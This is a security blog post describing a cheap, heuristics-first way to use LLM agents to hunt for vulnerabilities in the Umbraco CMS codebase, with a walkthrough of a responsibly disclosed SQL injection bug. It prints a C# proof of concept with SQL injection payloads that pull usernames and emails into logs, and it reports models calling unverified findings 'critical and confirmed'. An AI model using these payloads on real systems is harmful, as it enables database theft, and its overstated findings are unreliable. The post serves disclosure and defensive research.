Finding Security Bugs with LLMs for 1% of the Cost | Etive Mòr

Nicholas Carlini did a talk a few weeks ago at [un]prompted 2026. In it, he describes how Anthropic have been using their Claude 4.5 & 4.6 series models to automate searching for security issues in repositories. He’s had some success, and managed to get a few new CVEs to his name with the technique. While novel, Carlini’s approach, as described, is an expensive way to search for bugs. I think that using a heuristics based approach to pre-search the codebase for interesting files before hunting, we can reduce the cost of his technique by 99% or more, while retaining most of the benefits. A link to the prompts used in this article are organised in the companion repository at https://github.com/Etive-Mor/language-model-look-kit.

Note: This article isn’t about Anthropic’s Mythos series.

In his talk, Carlini describes writing a bash script which loops through every ${file} in a repository. The script launches an instance of Claude Code, tells it that it’s playing a Capture The Flag (CTF) discovery game, asking it to search for potential vulnerabilities in the codebase, focussing on ${file} as a starting point. For each file, he invokes the process five times. He found a few security vulnerabilities and lots of regular bugs too, including a long-standing heap buffer overflow in the Linux Kernel (that’s a super rare find).

That’s a lot of tokens

Carlini’s approach is fairly “brute force”, and definitely super expensive. The Linux Kernel has 80k+ files containing tens of millions of lines of code. If we set a conservative average Claude Code invocation cost of $0.10 per file, and five invocations per file, this process would cost $40k across the Linux Kernel. The Anthropic Fellows program offers 4 months of $15k/mo in compute funding, so this mid-five-figure price is within the expected range for an internal research experiment.

Carlini is embedded in Anthropic, so had access to basically unlimited compute for the project. So, for him, looping through every file in Linux and spawning a Claude Code was a viable plan of action. However, even for very well funded open source projects, this would be financially ruinous. I wanted to see how much of the capabilities I could reproduce in a smaller open source repository, on a lower budget.

Heuristics-based vulnerability discovery

I think having a language model generate a heuristics-based list of interesting components first, and then scanning through those is a low-cost way to get a lot of the same benefits as Carlini’s technique. Maybe you don’t get 100% coverage, but hitting the most interesting 80% of files (especially those on the code hot-path) should reveal any critical bugs for less than $100.

I’ve worked with Umbraco CMS and .NET for more than a decade now, and I sit on the project’s Community Security & Privacy Team, so I thought that the best place to test out a cheaper variant of this approach was in that project’s main repository at Umbraco/Umbraco-CMS. The project has 450k lines of code across 8,500 files, so while it’s smaller than Linux, it’s still large enough to demonstrate the concept. Using the estimates above, this project would cost around $4k to run through Carlini’s technique.

With my approach, I was able to spend less than $20 in GitHub Copilot tokens, while discovering 20 potential vulnerabilities. After some human review, I whittled these down to four which were interesting enough to address. The process found no severe vulnerabilities worthy of a CVE, but did reveal a handful of (now patched) issues & bugs which required a change in the repository. This somewhat mirrors Carlini’s experience, that he found lots of issues, and then spent a lot of time doing manual review to demonstrate them before disclosing. The process, and a deep-dive on one of the bugs is outlined below.

Everything described in this article has been responsibly disclosed, patched, or mitigated appropriately. If you recreate any of the work below in any repository, make sure you stick to the principles of responsible disclosure. If you find any issues in any Umbraco application, please follow the “How to report a vulnerability in Umbraco” process, and report by emailing security@umbraco.com.

Building the tool

When selecting models, I wanted to take a pluralist approach, rather than limiting or coupling myself to Anthropic’s models. To achieve this, I decided to work with GitHub Copilot via VSCode’s chat features. Umbraco-CMS uses a lot of Claude Code tooling, which means the repository has lots of CLAUDE.md files. While that documentation is useful if you’re running Claude Code, it’s distributed sporadically throughout the app. Models like Codex and Mistral only access those files intermittently, if at all. I want to consolidate this info into a single directory, and decouple it from Claude.

Model onboarding prompt

I’ve got a template prompt which will help a language model generate a set of onboarding documents for itself for a given repository. This prompt is generically useful, not just good for security searches (I’m a contracting software engineer, and it’s the first thing I run when starting work on a new project these days). The outcome of the prompt is a clean introduction-to-{repository} directory describing everything the language models need to know about, in markdown. Since all subsequent tasks are reliant on this documentation being detailed & comprehensive, I tend to run this with the biggest model available, on its highest reasoning setting (in this case, it was Opus 4.6). The origination prompt can be found in the companion repo here.

The closing text of the origination prompt is “Start by analysing the codebase and generating the _start.md and agent-task-list.md files. Then return control to the developer.”. So, although the prompt is long, we get an opportunity to review its output early, before dispatching a dozen sub-agents reliant on its output.

When control is returned by Copilot, a couple of files have been generated. _start.md describes how to run the application, including troubleshooting and system specific stuff. Ideally, the _start.md document should describe to any arbitrary agent how it could run the app with no human intervention. Sample output can be found at language-model-look-kit/_samples/_onboarding/_start.md

Meanwhile _agent-task-list.md generates a series of tasks to be completed by subsequent agents. The aim of the _agent-task-list.md is to describe to a subsequent agent where an interesting component of the application lives, and how that component should be documented. Sample output can be found at language-model-look-kit/_samples/_onboarding/agent-task-list.md

After reviewing the files generated by the origination prompt, I dispatch sub-agents to build the comprehensive docs: “For each task in agent-task-list, dispatch a sub-agent to write the appropriate markdown files.”. This spawns a series of sub-agents per task in _agent-task-list.md.

When the parent-agent dispatches the tasks to the sub-agents, each sub-agent is provided only its task from _agent-task-list.md and doesn’t share the context window of the parent-agent. This is useful for a few reasons: 1) it prevents the parent-agent’s context window from becoming exhausted when working on very large projects. 2) it allows the sub-agent to focus, so for example, the sub-agent documenting security considerations in the caching layer is working exclusively on that concept (there are some downsides to this approach which will become obvious later). 3) it’s parallelisable, meaning the large documentation assets are written in 10 minutes instead of a few hours, and 4) it means I can run the “dispatch sub-agent” approach on smaller cheaper models, while still getting decent results.

That first prompt generated everything for the backend/C# code, but Umbraco-CMS’s backend has a Typescript client app (the frontend for the backend). I dispatch more subagents to run through that process focussing on the JS/TS client app: “We want to dispatch a new subagent set to create these .md files for the _notes/_onboarding/backoffice-client/ directory, focusing on the backoffice-client library - as that component is distinct enough from the rest of the application to require its own section.”. The sub-agents for the client app go through roughly the same steps as they did for the back-end code.

Once the sub-agent tasks are completed, I’ve got a directory with a few dozen files describing the Umbraco-CMS repository in reasonable detail. I review the generated documentation files manually, and they’re mostly good - some are a bit high-level for my liking, but they should be good enough for the tasks ahead. Importantly, most of them contain a section titled Security Considerations. Examples can be found in the companion repository’s _samples/_onboarding/_security/tasks/ directory.

Heuristics-based file pruning

The aim of my approach is to reduce the cost of discovery via agents. But so far, we’ve had the language models produce a bunch of tokens that Carlini didn’t. So, so far, I’m incurring a higher token cost than he did. However, part of the documentation process included generating a “security considerations” section in each document. These sections were super high level bullet point lists, but they guide the next phase.

I dispatch a sub-agent, asking it to hunt for potential security issues highlighted in the new docs files. Instead of reading through every code file in the app like in Carlini’s example, we now read through every .md file in the onboarding directory. This reduces the search space for Umbraco from 8500 files to ~40.

This sub-agent isn’t asked to go into massive detail on the potential issue, it’s just asked to find the interesting stuff in the app that’s worth looking further into. It’s not asked to validate the existence of any specific issue, just to seek out the chance of an issue, and rank how interesting/critical that vulnerability might be.

This is a security research project, so we're hunting for potential security issues in the app.

Dispatch one sub-agent to read through all of the generated files (including the files in the new `_onboarding/backoffice-client` directory). Into `_notes/_onboarding/_security/_ranking.md` write a ranking table of the most interesting sections of the application from a security research point of view. Include explanations of why specific parts are of interest.

Have the agent also produce a list of specific files which should be inspected more closely at `_notes/_onboarding/_security/_ranking-files.md`

The output shouldn't be generic like "this is the login controller, check here" it should look at code-smells which typically result in security vulnerabilities.

Ranked vulnerability opportunities

The outputs from the models up until this point have been OK. But at this now they start to get a bit weaker. The prompt generated a pair of ranking files. ranking.md describes some potential bugs, and _ranking-files.md associates those bugs to specific lines. That part was correct according to the request, however the model (Claude Opus) was incredibly eager about its vulnerability rankings. It found 20 components of interest, and described the severity on almost all of them as “critical” or “high”.

A few of the results included the phrase “critical / confirmed vulnerabilities”, even though no detailed investigation had been carried out. If I were to re-do this research, I’d definitely focus on this step a bit more, and make sure the prompt above constrained the output a bit. I was really hoping for dry-and-technical, but what I got was excited-fluff from the model.

Nonetheless, I continued with the effort, since Language Models are relatively good at dealing with ambiguity. Next, I wanted to break each potential vulnerability down into a task for another sub-agent to work on. The following prompt groups the items in the ranking*.md files, and generates tasks to investigate & prove-out the vulnerability.

into `_notes/_onboarding/_security/tasks/task-n.md`, where `n` is the task number, create tasks files detailing:

- what the vulnerability is
- what its suggested "blast radius" is. Don't oversell this entry, it needs to be realistic
- call chain which invokes the code or scenario
- a strategy to validate the vulnerability (a program, feature implementation, package, etc)
- an outcome which would prove that the vulnerability does/doesn't exist
- a minimal proposed fix (either implementation or guidance)

For the strategy, we want a methodology which would expose the vulnerability. The conditions are that you cannot modify the code in this repository, however you can:

- Create a small Umbraco package which exploits the vulnerability
- Implement a feature in an demo Umbraco site which exploits the vulnerability

---

Tasks to demonstrate vulnerability opportunities

I have the sub-agents produce tasks in order of their ranking, so that the most interesting stuff is demonstrated first. Each task has:

High-level description of the vulnerability
Description of the call chain, to make sure that the code can be executed in a production Umbraco environment
Explanation of the blast radius, so that the scope can be understood
Strategy to validate the vulnerability, for example a .cs file which would execute the appropriate call chain
Preregistration of validation outcome expectations, so that we can later test if the language model was correct in its expectations
Most importantly, a minimal proposed fix which can be submitted alongside the responsible disclosure of any bugs found.

The request generated twenty task files describing security vulnerabilities in Umbraco/Umbraco-CMS. They’re all fairly detailed, and a couple looked (on first glance) as if they’re very high-risk to leave in the Umbraco/Umbraco-CMS repository.

SQL Injection Opportunity (now patched)

The top-ranked vulnerability was a SQL injection opportunity in the Umbraco SQL Server Syntax Provider. A lower-ranked vulnerability was an essentially identical bug in the SQLite Syntax Provider. Copilot (GPT 5.x) described this as a “critical and confirmed” issue, so this looked like a pair of severe issues found inside of Umbraco! As I’ll describe in the following section, ultimately, it’s not a very critical issue, and it also hadn’t been confirmed when GPT asserted that it had (a lesson in the foibles of trusting output from an LLM without human verification).

The generated task file was created by Claude Sonnet 4.6, and can be found in full at the companion repository _samples/_umbraco-cms-samples/csharp-sample-sql-task.md

Diagnosing the SQL Injection opportunity

Umbraco uses SqlServerSyntaxProviders for common SQL functions so that developers don’t need to write a bunch of raw SQL statements all over their app. One of the pre-programmed queries checks if a database already has a Primary Key or not, if it does, it returns true, else returns false. That’s useful if you’re a package developer during an upgrade, as re-applying an existing primary-key causes exceptions. This specific implementation contains an unambiguous SQL injection opportunity:

public override bool DoesPrimaryKeyExist(IDatabase db, string tableName, string primaryKeyName)
{
   IEnumerable<SqlPrimaryKey>? keys = db.Fetch<SqlPrimaryKey>(
       $"select * from sysobjects where xtype='pk' and  parent_obj in (select id from sysobjects where name='{tableName}')")
       .Where(x => x.Name == primaryKeyName);
   return keys.FirstOrDefault() is not null;
}

tableName is passed directly into the SQL statement, rather than parameterised. This means, anything that’s passed into the DoesPrimaryKeyExist function’s tableName property will be executed by the SQL instance. That’s interesting, but the function returns a bool, which adds a level of complexity to exploiting this vulnerability. Even if I can have the SQL server execute code, it’s only going to return a 1 or 0.

Demonstrating the SQL Injection opportunity

The task file generated included a technique to validate the vulnerability. Though the core concept described was sound, it was a very round-about way of executing the call chain to get the vulnerable code. It included building out a .NET package, installing a custom SQL profiler, and a bunch of other steps which seemed needless. Importantly, the reproduction steps only checked if the raw SQL arrived at the server, and didn’t check if the attacker could read the results. That’s not a useless exploit, but it reduces the impact significantly if an attacker can create/update/delete, but cannot read data.

For starters, for a proof of concept useful for responsible disclosure, we don’t need to build out the package, attach the SQL profiler etc. We just need to launch an Umbraco site locally, and add in a new .cs file which registers a migration with Umbraco via an IComposer. Secondly, we can expand the exploit’s scope to include read. As a C#/.NET developer, I know that when SQL Server & SQLite return an Exception on a value conversion operation, the value being converted is included inside of the Exception. As an Umbraco developer, I know that exceptions are logged by default. So, even though I only have a true/false result available from DoesPrimaryKeyExist, I can force an exception to redirect schema and content into the Umbraco logfile, and exfiltrate it that way by reading back up the logger.

The PoC code includes two AsyncMigrationBase extending classes. The first is omitted for brevity, but it just registers migrations in the Umbraco app. The second is a set of payloads to pass into the PrimaryKeyExists function’s tableName parameter.

public class SqlInjectionProbe_Migration : AsyncMigrationBase
{
   // ...
   protected override Task MigrateAsync()
   {
       string payloadD = "x' UNION SELECT id FROM sysobjects WHERE name='umbracoUser";
       string payloadE = "x' UNION SELECT TOP 1 CONVERT(INT, userName) FROM dbo.umbracoUser WHERE '1'='1";
       string payloadG = "x' UNION SELECT TOP 1 CONVERT(INT, userEmail) FROM dbo.umbracoUser WHERE '1'='1";

       RunProbe("PayloadD_SchemaDiscovery",   payloadD, "PK_umbracoNode");
       RunProbe("PayloadE_UserExfiltration",  payloadE, "PK_umbracoNode");
       RunProbe("PayloadG_EmailExfiltration", payloadG, "PK_umbracoNode");

       return Task.CompletedTask;
   }
   // ...
}

So, what’s happening in these payloads?

PayloadD demonstrates schema discovery capabilities, by showing that the umbracoUser table exists in the application. An attacker could iterate through common Umbraco or C# table names to expose the structure of the database.
PayloadE performs username exfiltration, by causing a type conversion error. As Umbraco developers, we know that UmbracoUser contains a column userName which is an integer. Calling this function in a loop between int.min and int.max will pass every userName into the logfile. A restructured version of this query would reveal values in other columns with the same technique
PayloadG reapplies the username exfiltration to reveal the user email addresses

The migrations are put into an Umbraco IComposer, meaning they’re automatically applied to the database on the next site startup. IComposers in Umbraco can be registered by first party, second party, or third party code (which is why Claude described this as a high-impact vulnerability). When the site next starts up, the log file includes both schema and data from the database.

With a bit of effort, these three commands can be piped into a tool like sqlmap, allowing an attacker to enumerate the database schema, and subsequently all table data too (this includes well-known Umbraco tables like umbracoUser and also arbitrarily named tables eg. customMemberPaymentDetail). Fortunately because the bug is in a SELECT statement, there’s no good way to run an INSERT/UPDATE/DELETE command, so the damage is limited to reading the database. Still not ideal. Almost any process which has access to run the DoesPrimaryKeyExist function also has the ability to read from the logfile, so the process of exfiltrating this data is straightforward, and omitted from the PoC for brevity.

So why isn’t this SQL Injection opportunity as big a deal as Claude thinks?

Claude reported the blast radius on this as very wide. It described that the exploit could be triggered by “Any party that can register an Umbraco migration — including third-party packages installed by a site administrator. The attack does NOT require direct database access or admin-level HTTP requests”. Nothing written there is incorrect, but the language model has missed the fact that any user who can execute the DoesPrimaryKeyExist code can also execute the Database.Fetch function, which executes arbitrary SQL already. So, although the DoesPrimaryKeyExist definitely has a SQL Injection bug, that SQL Injection bug is only ever exploitable by code which intentionally has more convenient route to execute SQL commands.

SQL Injection disclosure

Even though the bug didn’t seem to be exploitable in any meaningful way, I still followed Umbraco’s responsible disclosure techniques. I didn’t want to leave the opportunity in the repository, but also didn’t want to open an public issue only to find that there was a side-channel I’d not considered. The support engineer dealing with the report at Umbraco dutifully & quickly reproduced my results. They responded that, although this was an interesting find & required a PR to fix, it wasn’t a CVE-worthy exploit because of the existence of the legitimate Fetch method. I agreed with the engineer, and opened a PR to parameterise the SQL statement.

The initial result from the language models was promising, and the way that Claude & GPT both described this injection opportunity as a “significant & confirmed” issue made it look even more promising. In the end, it took a huge amount of human effort & expertise to find that this was a false-positive. The bug fix PR is merged into Umbraco/Umbraco-CMS, and is due to be released in the next Umbraco version 17.4.

Results

So the high-severity SQL Injection issue turned out to be a false-positive. But there are still 18 other issues to be considered. Some quick QA shows that the models consistently over-hyped the bug, and sometimes misunderstood the implementation.

XSS via unsafe HTML Injection

Three issues were caused by sanitizeHTML not being called on untrusted HTML sources; this opens that code up to Cross Site Scripting (XSS) exploits. GPT and Claude both described these as “high-severity” and “critical” issues.

Looking at the files in question, the “untrusted sources” are UmbracoHQ, who publish news stories into the Umbraco dashboard. So the attack vector here includes sitting between Umbraco’s well-known domain and the target Umbraco instance. While there’s some risk here, it’s inaccurate to describe Umbraco.com as an untrusted source in this context. Developers can choose to remove the dashboard section which renders this code if they wish, as Aaron Sadler describes.

For the underlying sanitizeHTML issues, I opened a PR which was superseded by a more comprehensive UmbracoHQ patch a couple of weeks later. During my QA on those issues, I found that some of the documentation around sanitizeHTML was incorrect, so I opened a separate PR to deal with that too.

XXE via misconfigured XmlProcessing

Five of the issues were raised were related to XXE attacks in Umbraco’s OEmbed code. Similar to the SQL Injection opportunity, this looked promising, but required a lot of human effort to conclude it was a false-positive. When XML data are loaded from a remote endpoint in Umbraco, it’s parsed using .Net’s built-in XmlDocument parsing. If misconfigured, this can allow denial of service attacks, or could allow an attacker to read files on the host machine.

The attack vector for this vulnerability included a site like Flickr being compromised, at the same time as a content editor clicked a rarely used “download content” feature in the Umbraco backoffice. This is an unlikely pair of circumstances, but could be achieved in conjunction with some kind of man-in-the-middle attack imitating Flickr, so it was still worth testing.

I wrote a small program which would serve an XXE payload through a python http server which would inject a “hello XXE” text into the Umbraco app’s console log. I pointed Flickr.com XML requests towards the attack server. For some reason it didn’t cause the expected outcome…

Looking closer at the code in question, I realised Claude, GPT, and Mistral were all misreferencing .NET’s documentation. Since .NET 5 (the 2020 version), the framework has defaulted to Prohibiting the processing of untrusted XML instructions during parsing.

GPT, Claude, and Mistral all described this as a critical vulnerability due to their misunderstanding of the downstream framework code. I spent a few hours demonstrating that this was a false-positive. Still, as part of a defense-in-depth approach, I opened a PR in the repository to explicitly set DtdProcessing to Prohibited. As a nice bonus, this cleared up MSBuild warning CA3075 in the project.

Bypassing TLS Certificate

Umbraco allows developers to register named HttpClients, and those clients can enable a property DangerousAcceptAnyServerCertificateValidator. That’d disable TLS certificate validation for requests made with that HttpClient. This is more of a feature than a bug. Lots of engineers run untrusted local http clients during development (until recently, it was a massive pain to do otherwise in Windows). Umbraco handles this in the industry-standard way, by making the engineer type out “Dangerous Accept” when invoking this behaviour.

This is described as “severe” by the agents. Certainly a downstream site implementing this feature in production would be “severe”, but Umbraco-CMS offering this functionality is expected for any .NET application. The language models appear to have misunderstood their assignment, that they’re testing the security of Umbraco-CMS’s code, and not the implementation of a hypothetical worst-case downstream implementer.

Unauthenticated controller endpoints

Several other issues were raised where C# controllers included an [AllowAnonymous] decoration. This allows any unauthenticated caller to execute the controller’s method and receive data from it. That’s a legitimate concern, if the controller reveals any sensitive information, for example a Members controller which allowed anonymous access to arbitrary members in the database.

Sometimes though, you need to send variable server-side data to users who aren’t logged in. For example, the ServerStatusController describes if the server requires an upgrade. Unauthenticated users need to know this so that they’re presented with the appropriate upgrade UI.

This class of issues was fairly disappointing to see from the language models. The endpoints which are [AllowAnonymous] in the repository are all marked up with surrounding comments explaining why the method has that decoration. The language models had freedom to roam around the codebase and confirm that the data being accessed was non-sensitive in nature. One of the reports returned the statement The research question is: exactly what data is returned to unauthenticated callers, and does any of that data meaningfully assist an attacker in mounting a targeted attack?. The models had the capacity to declare these as false-positives in their reports, but didn’t. This creates a time-consuming problem with my technique.

Other issues

The remaining issues were either duplicates of the above, or a misunderstanding of a core .NET concept.

Process Cost

I ran this inside of GitHub Copilot using a mixture of Claude Opus 4.5/4.6, Claude Sonnet 4.5/4.6, various GPT 5.x versions. I also ran Mistral Large via an API in Cline for a few requests. The total non-subsidised gross amount for Copilot across the three days was below $18. Mistral’s API consumption for the day I was using it was just under $2.

Conclusion

So, no CVEs found, but a few PRs merged, and Umbraco’s documentation is a little clearer than when I started. I think overall I found this to be a useful process. I certainly learned more about software security, especially for Umbraco-CMS.

Near the end of his talk, Carlini describes some of the challenges of applying his technique in the real world, and they’re all things that I also encountered. He had a bit of a needle-in-a-stack-of-needles problem, in that Claude found loads of potential vulnerabilities, and Carlini’s one engineer. For both Carlini and I, neither of us wanted to commence the responsible disclosure process for the bugs until we’d demonstrated if they’re exploitable in practice. Each of those potential exploits requires expertise to diagnose, reproduce, and repair.

I think what I have managed to do is roughly replicate Carlini’s process on a budget, bringing accessibility to this type of scanning within the token budget of most large open source projects. Earlier I guesstimated that running Carlini’s process across the Umbraco/Umbraco-CMS repository might cost $4k. The cost to run my process was lower than $20 in GitHub Copilot tokens. The cost to review and diagnose the issues was

3 days of my time
1 day of my very patient software security colleague’s time
1-2 days of UmbracoHQ’s time investigating the issues

I think it’s a reasonable assumption that Carlini’s reports would incur roughly the same manual engineering labour.

Feel free to try the prompts out on your own repositories. They’re published at https://github.com/Etive-Mor/language-model-look-kit. Your mileage may vary, as some vendors are introducing rules & guardrails which block 2nd and 3rd party security auditing prompts from working.